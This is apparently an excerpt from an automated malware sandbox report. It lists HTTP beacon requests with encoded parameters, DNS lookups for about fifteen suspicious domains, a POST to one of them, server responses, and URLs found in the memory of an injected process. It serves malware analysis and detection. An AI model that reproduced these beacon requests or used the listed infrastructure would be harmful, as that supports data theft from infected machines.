            Source: global trafficHTTP traffic detected: GET /p2w8/?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.healthsolutions.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0jqq/?mvjDMBx8=AboyIhWIgkAsu1nqRInTjiDB5La4qA9HyyvfFBNZK/fCO9WV0V/gZMn0uKI8YjcOlIWVaRm32fVlTzhGJzR60qB7FB0ybEu2AENms3yOanM/608x1TKdZl2B8TKOA7VaQ/jM9wk=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.staffmasters.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.personal-loans-jp8.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kamicare-com.tokyoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sorriragora.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.gate-eight.net
            Source: global trafficDNS traffic detected: DNS query: www.glitterinthegrey.shop
            Source: global trafficDNS traffic detected: DNS query: www.indeks.space
            Source: global trafficDNS traffic detected: DNS query: www.cs0724sd92jj.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kontorpaneli.xyz
            Source: global trafficDNS traffic detected: DNS query: www.globyglen.info
            Source: global trafficDNS traffic detected: DNS query: www.techcables.shop
            Source: global trafficDNS traffic detected: DNS query: www.adindadisini15.click
            Source: global trafficDNS traffic detected: DNS query: www.stolex.top
            Source: global trafficDNS traffic detected: DNS query: www.healthsolutions.top
            Source: global trafficDNS traffic detected: DNS query: www.staffmasters.online
            Source: global trafficDNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kamicare-com.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.sorriragora.online
            Source: global trafficDNS traffic detected: DNS query: www.cchelvn.shop
            Source: unknownHTTP traffic detected: POST /zch2/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.glitterinthegrey.shopOrigin: http://www.glitterinthegrey.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 213Referer: http://www.glitterinthegrey.shop/zch2/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:42:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:42:49 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:42:51 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:42:54 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:42:59.5198668Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:42:57 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:43:02.0663113Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: a7b_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 06:43:30 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: a7b_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 06:43:33 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: a7b_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 content-length: 13246 content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 06:43:35 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:43:43 GMT Server: Apache Content-Length: 18121 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:43:46 GMT Server: Apache Content-Length: 18121 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:43:49 GMT Server: Apache Content-Length: 18121 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:43:51 GMT Server: Apache Content-Length: 18121 Connection: close Content-Type: text/html; charset=utf-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:44:38 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Server: Apache Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:44:40 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Server: Apache Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:44:43 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Server: Apache Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:44:45 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Server: Apache Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:52 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 06:44:57 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 06:44:59 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 8cf_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNbyGI8aBV%2FoiBG1%2FYmu%2FFh4wj92U%2F2kEEnSmUcMBk3MU4NB3tjPSfmtv2pRWV6GTF5fDi8po4psmO5JYOin2VLQ9turi9%2F78745SUqnW5Mv3P66lyV5GOgQZefAJdZOqjeq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9a18c3db1742b9-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 06:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 8cf_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VGqyRRTLYnqolhzsnwW0VIUwivqNj12tkyl1zkuVCvFLGzfePq7YsWD4MOmDhvhmXA8sHo3sgatSIVIwmmATywi4rMGdmCil3BruBclzBd6xJgmwEuUx8aqJmDw3D8VqfTVA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9a18d3cee20f79-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000042B2000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004162000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://adindadisini15.click/vufj/?mvjDMBx8=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/images/favicon.png
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/light_bulb_off.pn
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/style.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-includes/js/jquery/jquery.min.js
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4575428088.000000000585E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cchelvn.shop
            Source: uExImirYECsTjI.exe, 00000008.00000002.4575428088.000000000585E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cchelvn.shop/q1r7/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004120000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAi
            Source: PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.techcables.shop/
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Nunito:400
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
